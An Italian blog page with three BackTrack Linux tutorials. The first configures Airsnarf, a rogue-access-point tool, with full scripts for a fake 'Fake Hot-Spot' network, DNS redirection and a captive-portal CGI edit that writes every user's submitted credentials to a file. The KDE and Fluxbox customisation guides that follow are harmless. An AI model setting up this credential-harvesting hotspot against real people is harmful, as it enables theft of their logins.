Configure AirSnarf on BackTrack

snarf.png

***

Ecco a voi un altro gioiellino di Defcon-69 , si tratta di un tutorial che spiega come configurare AirSnarf per la nostra BackTrack-3beta.

ancora una volta , grazie Def.

 

In questo breve tutorial spiegherò come configurare Airsnarf

Cos’è Airsnarf ?

Airsnarf è stato sviluppato e rilasciato per dimostrare la vulnerabilità intrinseca degli hot-spot.
E’ quindi, una banale wireless utility  che permette all’Eavesdropper di carpire le credenziali di accesso (user e pwd) di utenti che fanno uso di hot-spot pubblici. (Naturalmente l’uso  che se ne può fare è ben più ampio se usiamo un po’ di immaginazione!  )

Let’s work…

1.Prima di tutto creiamo due cartelle, chiamate “html” e “dhcp”, nei rispettivi percorsi:

“html”  —->  /var/www/
“dhcp” —-> /var/state/

Successivamente creiamo con un editor di testo, il file “dhcpd.leases” e lo copiamo in /var/state/dhcp/

2.Ora apriamo un editor di testo (nano, vi, kate, kedit, ecc…) e creiamo il file “rc.httpd” e vi copiamo all’interno il seguente source code:

#!/bin/sh
# Start/stop/restart the Apache web server.

conffile=/etc/httpd/httpd.conf

function start() {
if grep -q “^Include /etc/apache/mod_ssl.conf” $conffile ; then
/usr/sbin/apachectl startssl
else
/usr/sbin/apachectl start
fi
}

function stop() {
/usr/sbin/apachectl stop
}

function restart() {
/usr/sbin/apachectl restart
}

# See how we were called.
case “$1” in
start)
start
;;
stop)
stop
;;
restart)
restart
;;
*)
echo “usage $0 start|stop|restart” ;;
esac

Fatto questo, salvatelo e chiudete il file.

3.Ora riapriamo l’editor di testo (nano, vi, kate, kedit, ecc…) e creiamo il file “rc.dhcpd” e vi copiamo all’interno il seguente source code:

#!/bin/sh
# Start/stop/restart the Samba SMB file/print server.

dhcpd_start() {
if [ -x /usr/sbin/dhcpd -a -r /etc/dhcpd.conf ]; then
echo “Starting Dhcp…”
/usr/sbin/dhcpd -cf /etc/dhcpd.conf ath0
fi
}

dhcpd_stop() {
killall dhcpd
}

dhcpd_restart() {
dhcpd_stop
sleep 2
dhcpd_start
}

case “$1” in
‘start’)
dhcpd_start
;;
‘stop’)
dhcpd_stop
;;
‘restart’)
dhcpd_restart
;;
*)
# Default is “start”, for backwards compatibility with previous
# Slackware versions. This may change to a ‘usage’ error someday.
dhcpd_start
esac
Fatto questo, salvatelo e chiudete il file.

4.Entrambi i file andranno copiati nella seguente directory: /etc/rc.d/

5.Ora che siamo nella directory /etc/rc.d/ ed abbiamo copiato i due file, dobbiamo dargli i permessi di eseguibilità. Apriamo una shell (ed abbiamo copiato i due file, dobbiamo dargli i permessi di eseguibilità. Apriamo una shell (F4) e digitiamo:

chmod 755 /etc/rc.d/rc.httpd e poi chmod 755 /etc/rc.d/rc.dhcpd

6.Adesso andiamo in /pentest/wireless/airsnarf-0.2  e apriamo Airsnarf con un editor di testo.
Sostituiamo il contenuto del file con il seguente source code:

#!/bin/bash
# airsnarf.sh
# A rogue AP setup utility.

echo “Airsnarf – A rogue AP setup utility.”
echo “0.2”
echo “The Shmoo Group”
# here are some variables you may want to edit
WWW_ROOT=”/var/www/html”
CGI_ROOT=”/var/www/cgi-bin”
LOCAL_CFG=”./cfg”

# specify another config dir with a command line arg if you want
if [ $1 ]
then
LOCAL_CFG=”$1″
fi

source $LOCAL_CFG/airsnarf.cfg

# create the dhcpd.conf
echo -n “Creating dhcpd.conf…”
sed s/AIRSNARF/$ROGUE_NET/g ./etc/dhcpd.src > /etc/dhcpd.conf
echo “Done.”

# copy over the www stuff
echo -n “Building the captive portal…”
cp $LOCAL_CFG/html/* $WWW_ROOT
cp $LOCAL_CFG/cgi-bin/* $CGI_ROOT
chmod +x $CGI_ROOT/*
echo “Done.”

# set our wireless parameters
echo -n “Setting the wireless parameters…”
ifconfig $ROGUE_INTERFACE down
wlanconfig $ROGUE_INTERFACE destroy
wlanconfig $ROGUE_INTERFACE create wlandev wifi0 wlanmode ap
ifconfig $ROGUE_INTERFACE up
iwconfig $ROGUE_INTERFACE essid $ROGUE_SSID mode master
echo “Done.”

# set our ip and default route
echo -n “Setting the ip address and default route…”
ifconfig $ROGUE_INTERFACE $ROGUE_GW
route add -net 0.0.0.0 gw $ROGUE_GW
echo “Done.”

# restart some services
/usr/sbin/dhcpd -cf /etc/dhcpd.conf
/usr/sbin/apachectl restart
#/etc/init.d/sendmail restart

# set up the firewall to redirect
echo -n “Setting up firewall to redirect DNS…”
echo 1 > /proc/sys/net/ipv4/ip_forward
modprobe iptable_nat
iptables -F -t nat
iptables -t nat -A PREROUTING -p udp –dport 53 -j DNAT \
–to $ROGUE_GW
# dammit, I swear this used to work with just an OUTPUT rule…
iptables -t nat -A OUTPUT -p udp –dport 53 -j DNAT \
–to $ROGUE_GW
echo “Done.”

# start the local dns resolver
echo “Starting local DNS resolver…”
chmod +x ./bin/airsnarf_dns.pl
./bin/airsnarf_dns.pl

Fatto questo, salvatelo e chiudete il file.

7.Adesso andiamo in /pentest/wireless/airsnarf-0.2/cfg  e apriamo Airsnarf.cfg con un editor di testo.
Sostituiamo il contenuto del file con il seguente source code:

ROGUE_SSID=”Fake Hot-Spot”
ROGUE_NET=”192.168.1.”
ROGUE_GW=”192.168.1.254″
ROGUE_INTERFACE=”ath0″
#export ROGUE_SSID ROGUE_NET ROGUE_GW ROGUE_INTERFACE

8.Adesso andiamo in /pentest/wireless/airsnarf-0.2/cfg/cgi-bin  e apriamo Airsnarf.cgi con un editor di testo.
Cerchiamo la serie di righe di codice che iniziano con “$mailprog = ‘/usr/sbin/sendmail’;” e finiscono con “close(MAIL);” e le commentiamo col carattere # oppure le cancelliamo.
E vi copiamo il seguente source code:

open (MYFILE, ‘>>/tmp/airsnarf_pwds.txt’);
foreach $key (keys(%FORM)) {
print MYFILE “$key = $FORM{$key}\n”;
print MYFILE “———————-\n”;
}
;

Fatto questo, salvatelo e chiudete il file.

9.Ora basterà che apriate una shell, andiate in /pentest/wireless/airsnarf-0.2/ e lanciate airsnarf.

N.B  Una volta avviato airsnarf, aspettate che compaia la scritta “Waitintg for connections…” e terminate airsnarf. Andate in /var/www/html, copiatevi tutti i file contenutivi e incollate tutti i file qui: /var/www/htdocs  .

/var/www/htdocs .

See  u Dudes!

Defcon-69

Defcon-69 -WiFi-ITA.com-

Annunci

KDE : configurazione

***

Non sono di certo io a dovervi insegnare come configurare un Desktop Manager semplice come KDE , mi comporterò quindi di conseguenza alle richieste che mi sono arrivate , esplicando quindi alcuni metodi per la personalizzazione di KDE.

Ma subio due parole…

KDE , ovvero K-Desktop-Environment , è sempre stato considerato come l’ “altro” Desktop dei sistemi GNU/Linux , all’ inizio come molti ricorderanno c’era solo il Desktop Gnome , KDE era una società privata e commerciale , ma una volta diventata Opensource divenne subito la scelta principale assieme a Gnome per una parte grandissima deli utenti GNU/Linux.

KDE , a differenza di Gnome che usa le librerie grafiche Gtk , usa le librerie grafiche QT , e già da prima vista risulta un Desktop Manager abbastanza semplice ed intuitivo , se KDE , ha quel qualcosa in più a molti altri Desktop Manager che girano su sistemi GNU/Linux , credo che sia proprio l’ alto livello di personalizzazione dell’ ambiente grafico , che non invade in maniera sproporzionata l’ ambito prestazionale.

Iniziamo però con la personalizzazione di KDE.

Molte cose , che fino a poco tempo fà erano solo per coloro che avevano un hardware perfettamente riconosciuto , oggi grazie al nuovo Xorg ed al nuovo kernel , si allargano alla stragrande maggioranza degli utenti. La BackTtrack è sempre stata una distro “bella” o meglio “figa” o “cool” , e che ha sempre esercitato il proprio fascino.

Prima di cominciare faccio un brevissimo Off-Topic.
Dalla versione 3beta tutti coloro che usano la BackTrack da usb hanno la possibilità di entrare in ambiente grafico con Compiz. Compiz è un vero toccasana per gli occhi , chissà quanti utenti sono passati al mondo GNU/Linux solo per averlo sulla propria macchina , a me personalmente Compiz piace , ma vista l’ abitudine che presi già con ubuntu e poi con debian , ho sempre preferito Beryl al Compiz , e devo dire che anche se in modo totalmente involontario ho sempre il 3D attaccato in condizioni “normali” , questo perché sono più veloce con mouse e tastiera , cambio Desktop molto più velocemente , e sinceramente anche in BackTrack , a meno che non stia facendo qualche prova di pentesting ho sempre il 3D “attaccato”…. ….questo discorso pero e cambiato recentemente , avendo preso un laptop con prestazioni “limitate” , sono passato a Flux , oppure tengo il mio solito KDE ma al 3D non ci penso proprio , e da qui anche la decisione di scrivere a riguardo di Flux.

Se avete la BT installata su HarDisk e volete usare o provare il Beryl , vi consiglio di scaricarvi i pacchetti per la Slackware-12 , più precisamente quelli per la Gnome-Slacky12 , dai repository di Slacky.eu a quest’ indirizzo.

Ora possiamo procedere…

La prima cosa , che faccio è il darvi l’ url di Kde-Look.org , dove vengono postati ed inseriti files e script che possono aiutarvi nella personalizzazione della vostra BackTrack.

Io ho sempre attivo il mio tema Superkaramba , e li prendo naturalmente da Kde-Look.org , dove ce ne sono moltissimi , è una cosa fin troppo semplice , basta aprire Superkaramba da Kde -> Utility -> Desktop -> Desktop Widgest e all’ apertura selezionare New-Staff , dopo aver scelto il tema che preferiamo , cliccate su Dettagli e vi verrà riportato l’url da dove scaricare lo script per il tema da voi scelto , una volta scaricato , clickate su Open Local Theme e selezionatelo dal percorso in cui l’ avete scaricato precedentemente e clickate su Add To Desktop.

Ovviamente se volete potete andare su kde-look.org o deviantart o altri , scaricarvi il pacchetto e mettervelo nel Desktop , basta andare in superkaramba e scegliere come appena detto Local invece di New Staff.

Una cosa che a me piace molto avere nella mia BackTrack , e che molti utenti mi hanno chiesto , sono i colori per il Thunderbird e Firefox , che assomiglino il più possibile a quelli indicati per ubuntustudio , il fatto è che il procedimento è appena-appena più complicato , ma niente di ché…

…il risultato che otterrete per il vostro Desktop sarà il seguente:

***

studio1.png

***

Mentre per Firefox e per Thunderbird sarà una cosa di questo tipo:

***

studio3.png

***

studio4.png

***

Bene , per fare questo bisogna installarsi degli script che sono richiesti per l’ installazione di librerie GTK ed altre QT specifiche sia per Firefox che per Thunderbird , e che consentono di abbinare ai programmi i colori che si usano in KDE normalmente , di di stile-stema , ma facciamo tutto passo-passo.

Per prima cosa andate scaricatevi lo script da quì stud.txt , è un file che ho inserito io visto che su Kde-look.org non lo trovo più , prendetelo e rinominatelo con un’estensione *.kcsrc.

Il file per salvarlo dove cliccarci su con il tasto destro del mouse e fare salva destinazione con nome… …save link as.. e poi appena scaricato , ma anche prima , rinominatelo da *.png in .*txt. , ed una volta scaricato potete anche dargli invece dell estensione txt l estensione *.Kcsrc appositamente per KDEcolorScheme

A questo punto andate nel centro di controllo di KDE e poi su Apparence & Themes , da lì colors ed installate il nuovo tema. Subito dopo l’installazione , ed apportate le modifiche del caso , installatevi le librerie grafiche per KDE , dai repository di Slacky.eu , i nomi da cercare ed installare sono i seguenti:

gtk-qt-engine

gtk-splitter

gtk_theme_switch

e chi vuole , le icone tango style

Una volta installate le seguenti librerie , andate sempre nel centro di controllo di KDE in Apparence e Themes , ed installate la scroll-bar dalla nuova sezione creata con l’ installazione delle librerie e script sopra , denominata Gtk-Styles & Fonts , una volta fatta l ‘operazione spuntate l’ apposita casella per ottenere i colori di sistema che avete in KDE anche in applicazioni NON-KDE , ed il gioco è fatto.

Coloro che lo chiedono , se hanno problemi con l’installazione degli archivi in *tar.gz , riceveranno tranquillamente il pacchetto per slackware in *.tgz , installabile più facilmente , ma che purtroppo per ora non posso inserire.

In molti mi hanno chiesto di come cambiare i colori ll’ interno della propria shell , e quì il discorso è fattibile , ma consiglio come sempre un buon backup dei files che andremo a toccare.

Per cambiare i colori all’ interno della propia shell , si possono usare due strade , la prima e più semplice tocca solo la configurazione di default , e basta andare a selezionare il tipo di carttere in konsole da Setting -> Fonts -> Select , e poi da Setting -> Configure Konsole , scegliere il colore che vogliamo in base a ciò che vogliamo , ma dobbiamo sapere che otterremo un colore univoco in tutta la shell , dove l ‘unica cosa che cambierà saranno i caratteri “stampati” dal sistema , se volete cambiare i colori secondo diversi criteri , non posso che rimandarvi a questi indirizzi , dove l’ argomento è trattato in modo più specifico e non si rischia di cadere in piccole ma fastidiose trappole.

Un’ altra modifica che però posso descrivere è quella del testo del sistema durante il prompt , ad esempio , se in modalità default in BackTrack avremo una shell che riporta i seguenti caratteri:

bt ~ #

Volendo possiamo cambiarli , e per farlo dovremo modificare il file profile che si trova in /etc/ , quindi chi vuole da shell dia il comando:

nano /etc/profile

e aprirà direttamente in koncole il file profile.

Una volta aperto dovremo editare una riga , identificata nelle stringhe seguenti PS1=…

La sintassi che io ho usato per ottenere brigante@HaCkLaB , al posto del testo di default visto sopra è la seguente:

PS1=”\[\e[37;1m\]\[\e[31;1m\]e\e[31;1m\]\e[34;1m\]brigante\e[31;1m\]@HaCkLaB\e[34;1m\]

Occhio alla sintassi ragazzi , è tutto su una riga , fatevi il backup del file così non rischiate nulla…

Bene arrivati a questo punto vi esplicito il mio ultimo cambiamento che ho fatto , sto parlando della creazione nel menù classico di BackTrack di una sezione appositamente dedicata al P2P e al Ripping in genere.

Avendo una connessione Fastweb ho scaricato ed installato aMule Adunanza , che gira a meraviglia in BackTrack , come in tutte le altre Slackware , ho installato una copia di Nero-Linux , e mi sono creato una sezione apposita per il ripping video e per il P2P , ma questa è stata una mia scelta , per il semplice fatto che da sempre sono un appassionato del P2P , e nella sezione ho messo anche Azureus , Ktorrent , ManDVD , DeVeDe e tutto quello che mi serve…

Se qualcuno di voi vuole che venga aggiunto un argomento riguardo una sua personalizzazione , siamo quì che aspettiamo il vostro contributo.

ciao a tutti.

Fluxbox : configurazione

***

Ciao a tutti,

con il passare del tempo mi sto spostando semprepiu verso il Windows Manager , (WM) , Fluxbox , (Flux), questo perche il mio laptop , seppur di tutto rispetto , non e potente come il mio Pc-Desktop ed essendo abituato a determinate prestazioni e ad avere molti programmi aperti in background , ho deciso , con molta soddisfazione , di provare e poi passare al Desktop Manager Flux , pur rimanendo sempre un appassionato di KDE.

In questo tutorial quindi spieghero come poterne fare una prima configurazione e personalizzazione ed anche un primo uso , sia di Flux che di Kde.

[Iniziamo con FluxBox.]

Voglio iniziare pero col dire a tutti che sono completamente nuovo di Flux e siccome penso che continuero ad usarlo , chiunque trovi qualcosa da aggiungere al seguente tutorial e pregato di farmelo sapere , in modo tale da rendere un buon servizio a tutti coloro che vogliono saperne di piu. Molti link in BackTrack che sono inseriti in Flux sono “broken”… …rotti , e credo che se riusciremo a fare una raccolta di tutti i problemi magari fixandoli potremo scrivere un tutorial e una configurazione perfetta di FluxBox in BackTrack , magari inserendola nel wiki di remote-exploit.org.

Ma cominciamo pure…

Innanzitutto una frase descrittiva , cos e FluxBox?

FluxBox e un Desktop Manager detto propriamente:

A lightweigth windows manager for X windowing system (man fluxbox)

Flux e un Desktop Manager che si distingue dai tradizionali KDE e Gnome per la sua velocita , la sua performance in pratica e proviene da quello che e il DM Blackbox , solo che e considerato , giustamente , abbastanza piu avanzato e piu personalizzabile…

Le caratteristiche che ho appena descritto fanno di Flux un DM “usabile” anche su Pc non molto recenti , e per una security-distro come la BackTrack , e di fondamentale importanza che sia integrato gia da prima installazione.

Come per entrare in KDE da login digitiamo il classico comando “startx” , per entrare in FLUX dobbiamo digitare appunto il comando “flux” , appena entrati troveremo un DM con appena il background , il desktop-wallpaper in pratica , senza icone e senza nient altro.

In BackTrack pero , a differenza di altre distro , Flux si presenta con un proprio menu gia creato e basta dare un click con il tasto destro del mouse per poterlo vedere e “scorrere”.

Iniziamo ora a fare qualche modifica del DM Flux.

Innanzitutto devo dirvi subito che per ottenere la keymap italiana IT , dovete aprirvi e modificare xorg.conf , quindi da konsole:

______________________________________________________

bt ~ # kate /etc/X11/xorg.conf
______________________________________________________

fatto questo andate nella sezione Device riguardante la keymap e aggiungeteci: Option “XkbLayout” “it” , in modo da ottenere una sequenza come questa:

______________________________________________________

Section “InputDevice”
Identifier “Keyboard0”
Driver “kbd”
Option “XkbLayout” “it”
EndSection

______________________________________________________

Appena inserita la stringa , salvate e riavviate fluxbox e vedrete che la keymap sarà cambiata.

La prima cosa che mi passa in mente e quella del BACKGROUND , di cambiare l immagine al nostro Desktop praticamente ed in Flux per farlo si deve andare , (con Konqueror) , nella cartella a lui propriamente dedicata , ovvero /root/.fluxbox e poi entrare nella cartella backgrounds e creare un file di nome apps , con all interno la seguente stringa:

[startup] { fbsetbg -f /percorso_completo/nome_immagine.estensione }

naturalmente dopo lo slash va inserita la path della cartella contenente l immagine che noi vogliamo inserire come nostro background , e anche se ho scritto come fare per completezza , io mi trovo benissimo con il dragone di default in BackTrack , per impostare la nuova immagine come background in Flux dobbiamo dare il comando fbsetbg.

io ho comunque usato sempre il file ~/root/.fluxbox/startup , con la stringa per fbsetbg oppure per feh.

Visto che nella release 3.final di BackTrack ho avuto problemi con FBsetBg , ho cominciato ad usare una valida alternativa , feh.

feh è , almeno per il funzionamento che ci serve in questo momento , un programma che ci rende le stesse funzioni di FBsetBg , è installabile tramite i repository e con una stringa come la seguente…

feh –bg-scale /path/wallpaper.estensione

quindi con le opzioni –bg-scale , ci permette di avere un BackGround “scalato

Una caratteristica che Flux ha e quella che ci permette di usarlo con determinati temi , a mio avviso anche molto belli.

I temi per Flux possono essere scaricati dal sito ufficiale di Fluxbox , su Freshmeat , oppure anche da customize.org. non posso omettere naturalmente BOx-Look.org , dove ci sono oltre che a temi e look anche applicazioni varie.

I temi , una volta scaricati , vanno inseriti nella directory propriamente dedicata , e cioe:

/usr/share/fluxbox/styles

dove , come possiamo vedere , ce ne sono gia alcuni preinstallati e anche abbastanza belli.

E facile capire che , una volta inserito il tema nell apposita directory , basta clickare con il tasto destro sul desktop di Flux e selezionarlo da FluxBox menu -> System Style e scegliere il tema desiderato.

Dobbiamo capire naturalmente che non potremo mai avere uno stile grafico come in KDE o Gnome , se Flux e particolarmente performante e rapido , lo e anche per la grafica che supporta.

Come in ogni altro Desktop Manager , anche in FluxBox possiamo “settare” le shortcut , (ovvero le scorciatoie da tastiera), che vogliamo , solo che a differenza di altri DM piu noti , in FluxBox dobbiamo usare un determinato file , che andremo a modificare secondo delle regole prestabilite.

Il file da modificare e il keys , e si trova nella directory /root/.fluxbox.

Questo file va modificato tenendo conto dei comandi propriamente detti Modificatori , ovvero dei comandi che FluxBox tiene come prestabiliti.

Secondo il mio modo di lavorare , appena entrato in X , la prima cosa che faccio e connettermi alla mia rete , quindi servendomi del programma Wireless Assistant , sarebbe buona cosa crearmi un modificatore per questo programma , e per farlo andro quindi ad agire sul file keys.

Il keys contiene delle stringhe come queste:

Mod1 Tab :NextWindow
Mod1 Shift Tab :PrevWindow
Mod1 F1 :Workspace 1
Mod1 F2 :Workspace 2
Mod1 F3 :Workspace 3
Mod1 F4 :Workspace 4
Mod1 F5 :Workspace 5
Mod1 F6 :Workspace 6
Mod1 F7 :Workspace 7
Mod1 F8 :Workspace 8
Mod1 F9 :Workspace 9
Mod1 F10 :Workspace 10
Mod1 F11 :Workspace 11

Il Mod1 sta a rappresentare per default il tasto Alt , quindi come possiamo constatare premendo la combinazione di tasti Alt+F1 , verremo riportati sul Workspace1 , ovvero sul Desktop-1.

Visto che a me serve “settare” una shortcut per ottenere l apertura del Wireless Assistant , alla 1a riga , Mod1 F1 :Workspace 1 , andro a sostituire Workspace 1 con il comando per l apertura del Wireless Assistant , cioe wlassistant , dopo la stringa ExecCommand , in modo da ottenere:

Mod1 F1 :ExecCommand wlassistant.

E importante solo ricordare che il Mod1 equivale al tasto Alt , il Mod4 invece al tast “super” , o “Windows“.

La sintassi da seguire e la seguente:

[ modificatore carattere :ExecCommand comando ]

Una volta fatta questa e tutte le altre modifiche che vogliamo , salviamo il file e vedremo che le combinazioni di tasti saranno tenute regolarmente in memoria dal nostro FluxBox.

Questa è la sintassi corretta , ma non so il perché sul mio FluxBox , non riesco bene a settarlo , se qualcuno di voi ha consigli , siamo in ascolto…

Personalmente non uso molto le shortcut , ma mi servo regolarmente del classico Run Command , e quindi della Hystory Bash , (file fbrun_history) , che funziona come in tutti gli altri Desktop Manager e ci permette quindi di scorrere i comandi dati precedentemente con solo i tasti delle frecce direzionali.

Ora passiamo invece ad una configurazione benpiu importante , sto parlando della configurazione del Menu di Flux , che in pratica e il nostro strumento per poter accedere a qualsiasi file , programma o altro , visto che di icone , almeno al momento iniziale , il DM non e correlato.

Bene , il file da modificare per la configurazione del menu e appunto il menu , all interno della directory solita , e cioe:

/root/.fluxbox/menu

le modifiche sono da apportare come possiamo vedere ad un file che gia ha molte confogurazioni , in pratica e lo stesso file che ci si trova davanti se da Desktop si clicca con il tasto destro del mouse e si segue Setting -> Menu Editor.

Come funziona questo menu?

Bene , il file va modificao seguendo delle regole molto precise , ma di facile comprensione , esempio…

…all inizio del file possiamo vedere che ci sono delle stringhe che aprono dei menu e in seguitoaltre che aprono dei submenu , queste stringhe , appunto menu e submenu , vengono poste traparentesi quadre , e vengono inserite secondo dei criteri normalissimi , all interno delle stringhe vengono poi immessi i programmi per creare i menu ed eventualmente inserirvi i comandi per lanciare nuovi programmi , ma facciamo un esempio , questa che segue e una parte del mio menu:

[submenu] (Internet)
[exec] (Firefox) {firefox}
[exec] (XChat) {xchat}
[exec] (gFTP) {gftp}
[exec] (Konqueror) {kfmclient openProfile webbrowsing}
[exec] (Remote Desktop) {krdc}
[exec] (Set IP address) {kmdr-executor /usr/share/slax/network-conf.kmdr}
[exec] (Network Folder Wizard) {knetattach}
[end]

In questo submenu ho inserito il comando e l etichetta per Thunderbird e per il Wireless Assistant , in questo modo:

[submenu] (Internet)
[exec] (Firefox) {firefox}
[exec] (Thunderbird) {thunderbird}
[exec] (XChat) {xchat}
[exec] (gFTP) {gftp}
[exec] (Konqueror) {kfmclient openProfile webbrowsing}
[exec] (Remote Desktop) {krdc}
[exec] (Set IP address) {kmdr-executor /usr/share/slax/network-conf.kmdr}
[exec] (Network Folder Wizard) {knetattach}
[exec] (WirelessAssistant) {wlassistant}
[end]

La sintassi corretta e la seguente:

[exec] (NomeCheCompareNelMenu) {ComandoProgramma}

Attenzione pero , “traparentesi” graffe va inserito in questo caso solo il comando , ma nel caso in cui il programma da lanciare si trovi in un altra PATH invece che in /usr/bin , va indicata tutta la Path con il comando per intero , che comunque rimane un caso raro.

Ecco il risultato ottenuto dopo il cambiamento…

***

fluxmenu1.png

***

Per creare un proprio Submenu , il discorso e lo stesso , il nome va inserito come nella sintassi seguente:

[submenu] (etichetta_sottomenu)

E importante che ci si ricordi di chiudere un submenu che viene creato altrimenti si potrebbe incorrere in confusione , quindi alla fine , dopo aver inserito tutti i programmi che ci servono nel submenu , basta chiuderlo con la stringa seguente:

[end]

Nel caso in cui noi vogliamo inserirci un separatore , ci bastera inserire la stringa:

[separator]

Che puo essere utilizzato in qualsiasi posizione , quindi sia tra due submenu , che tra due programmi.

Ovviamente , come per gli altri Desktop Manager , anche in Fluxbox possono essere inseriti strumenti di controllo CPU o batteria e partizioni , e possiamo farlo installando e configurando , (ma va bene anche senza configurazione per chi vuole ) , Conky oppure GKrellim , che sono gli equivalenti più o meno , (molto più e poco meno) , dei più famosi Superkaramba e Desktop Widgets vari.

chi vuole può scaricarsi Conky da slacky.eu qui.

e GKrellim dalla pagina ufficiale del tool qui

Ovviamente dopo averli installati per lanciarli in automatico all’ avvio di Fluxbox seguite le indicazioni sopra oppure se volete solo attivarli voi stessi vi basta lanciarli da xterm , konsole o Run Command.

Se volete come nel mio caso che vi partano allo start di flux vi basta inserire nel file:

/root/.fluxbox/startup

le stringhe per i programmi… ….nel mio caso:

_________________________________________________

#my addict##

wlassistant &

fbdesk &

gkrellm &

_________________________________________________

Per quanto riguarda invece la configurazione dei due tools appena citati , il primo , Gkrellm , per poterlo configurare vi basta andare sullo stesso e con il tasto destro del mouse vi si aprirà una GUI che vi permetterà di configurarlo in maniera semplice.

I temi per GKrellm sono disponibili dai link della pagina ufficiale linkata sopra , una volta scaricati i temi scompattate i *.tar.gz e mettete la cartella appena scompattata all’ interno della directory /root/.gkrellm/themes , una volta fatta quest’ operazione potrete selezionare dalla GUI di configurazione del programma tutti i temi che vorrete.

questo screenshot è un esempio della mia configurazione con GKrellm…

***

***

Per conky invece le cose sono leggermente diverse , può essere configurato dallo stesso script .conkyrc , volendo apporre delle nostre modifiche vi linko una pagina che descrive le variabili di Conky…. ….QUÌ

La mia intenzione , visto che mi sto abituando con Flux , e quella di crearmi un Submenu contenente tutti i programmi suddivisi per sezione e metterlo sotto l etichetta BackTrack , piu o meno come relegata in KDE , e naturalmente seguendo il metodo sopradescritto.

Tutti i programmi che seguono la seguente sintassi e che si trovano nel file startup verranno automaticamente caricati all avvio. Ricordo che per un avvio in background di ogni applicazione bisogna aggiungere alla fine della stringa immessa il carattere & propriamente dedicato.

Passiamo ora a descrivere le SlitList , ovvero le dockapps , che noi vogliamo inserire sul nostro Desktop in maniera permanente.

Il file da modificare per inserire le nostre dockapps , e xinitrc , (file *.sh) , che si trova all interno della directory /root. (cosa però , che ancora non ho testato…)

Una cosa che però mi piace e che ho provato subito è l’ inserimento nel Background delle icone…

Al contrario di molte altre distro in BackTrack sono riuscito , dopo molto tempo , ad inserire le icone che mi servivano , (NetBeansEclipse e l’ editor Kate configurato per python) , solo tramite FbDesk , tool molto configurabile.

Una volta scaricato l’archivio dal link sopra , compiliamolo e per completezza come sempre leggetevi il file README , la compilazione è semplice: (non scrivo il nome per intero perché con il tempo potrebbero cambiare le versioni…)

________________________________________

tar xvfz nomepacchetto.tar.gz

cd cartella-estratta/

./configure

make

make install

________________________________________

Una volta installato FbDesk sempre tramite file: /root/.fluxbox/fbdeskdesk.icon , configuriamolo con una serie di stringhe di questo tipo: (per ogni cosa è tutto scritto nel file README all’ interno dell’ archivio) , quindi apritelo con un editor qualsiasi , io lo apro con Kate

________________________________________

[Desktop Entry]
Name=
Exec=/bin/sh “/usr/local/netbeans-6.0.1/bin/netbeans”
Icon=/root/.fluxbox/.idesktop/NetBeans.png
Pos= 502 115
[end]

________________________________________

È possibile immettere sul nostro background tutte le icone che vogliamo , e le stringhe , almeno alcune dovrebbero essere già presenti di default dall’ installazione di FbDesk.

Il campo Name l’ ho lasciato volutamente vuoto ma se avrei voluto avrei potuto inserirvi il nome dell’ icona , configurando anche il testo , dal font al background del testo stesso , che possono variare di colore e trasparenza ; Exec stà invece ad indicare il comando per l’ esecuzione del programma a cui l’ icona è stata associata ed Icon il percorso dove si trova l’ icona che vogliamo utilizzare , che anche se non dovrebbe variare io consiglio sempre di tenerla in una cartella nella directory: /root/.fluxbox/…. , io l’ ho chiamata .idesk per il semplice fatto che iDesk è il nome di un programma simile a FbDesk , ma che come ho detto appena sopra , almeno per il mio caso , non ha funzionato. Pos indica la posizione dell’ icona all’ interno del nostro background , ma se lanciate dal Run Command , fbrun , il comando fbdesk , vi compariranno sul desktop delle icone che però avranno l’ immagine di default , basta cliccarci sopra con il tasto destro del mouse e vi si aprirà il menu a tendina per configurare l’ icona.

una cosa che sembra aver trasportato in fluxbox molti utenti nuovi è la navigazione a schede…

infatti , creando in /root/.fluxbox/ un file di testo chiamato groups , (senza estensione…) , ed immettendovi dentro i nomi delle applicazioni che volete raggruppare , ad esempio , (per il mio caso)…

eTerm

opera

aterm

xterm

…eccetera , si possono avere molte finestre aperte di applicazioni di varia natura e passare dall’ una all’ altra con un semplice click sulla barra del titolo…

***

***

Come potete vedere dall’ immagine, (dove ho raggruppato una finestra di Eterm con una di Xterm) , io ho scelto di tenermi esternamente le linguette delle schede ma volendo possono essere internate all interno della barra del titolo , che del resto lo sono già di default… ….possono essere messe in verticale a sinistra della finestra a destra o anche in basso , basta agire in Fluxbox –> Configure –> Tab Options dallo stesso menù principale.

Dalla foto potete anche notare che ho inserito un pager , FBpager appunto , scaricato da QUÌ , e che mi ha permesso di avere un ottimo e soprattutto molto configurabile pager a portata di mano…

Il pager è configurabile con l’ apposito file di testo sempre in /root/fluxbox/ dal nome fbpager e che nel mio caso ho configurato per una trasparenza notevole , alpha:64 , comunque sempre attraverso lo script descritto nella pagina da cui il pacchetto si prende.

Un’ altra cosa particolare che è sia molto pratica sia molto gradevole all’ occhio è gtk-chtheme , che in pratica è uno script che ci permette sia di installare nuovi temi Gtk sia di selezionare quelli già installati… …se poi ci mettiamo che il tema di default in backtrack è abbastanza chiaro e che può nuocere leggermente a lungo andare , credo che sia veramente di grande importanza.

Lo script è scaricabile dai repo di slacky.eu a quest’ indirizzo , se con il passare del tempo il link possa andare perso vi basta cercare direttamente da slacky.eu.

I temi selezionabili sono i soliti di default in Kde più alcuni che lo script si porta dietro…

—> un’ vvertenza che mi sento di farvi è quella di non selezionare temi Qt , perché lo script ve lo permette , ma se non volete giocarvi le applicazioni Gtk , che non sono poche , vi consiglio quindi di non selezionare , o non attivare , Qt e QtCurve <—

Questo un mio screenshot dopo aver configurato le icone come sopra descritto:

***

***

Un’ altra cosa che ho fatto , come potete vedere benissimo dallo screenshot , è installarmi tramite repository aTerm. aTerm non è altro che una shell interattiva identica a xTerm , già presente di default per il WM Fluxbox , ma molto più configurabile. Se volete gli stessi effetti che ho configurato io , inserite all’ interno del vostro menu , (come descritto sopra per l’ inserimento di programmi nel menu di Fluxbox) , il comando per avere e lanciare l’ applicazione dal menu principale di Fluxbox , dopodiché inserite all’ interno del comando le variabili di aTerm che la rendono trasparente come nella foto… …la stringa che io ho usato è la seguente:

________________________________________

[exec] (aTerm) {aterm -bl -tr +sb -sr -sl 3000 -sk -bg black -fg white -bl -g 130×16+150-170 -sh 100}

________________________________________

dove la trasparenza è indicata in percentuale da -sh 100 , mentre le altre sono le misure e altre variabili riguardanti il testo , font con misure , posizione di apertura sul background eccetera…

La trasparenza come ben saprete in Fluxbox può essere applicata anche allo stesso menù , basta andare ad agire sul file di configurazione del tema stesso , anche se come sempre vi consiglio di farvi il vostro solito backup.

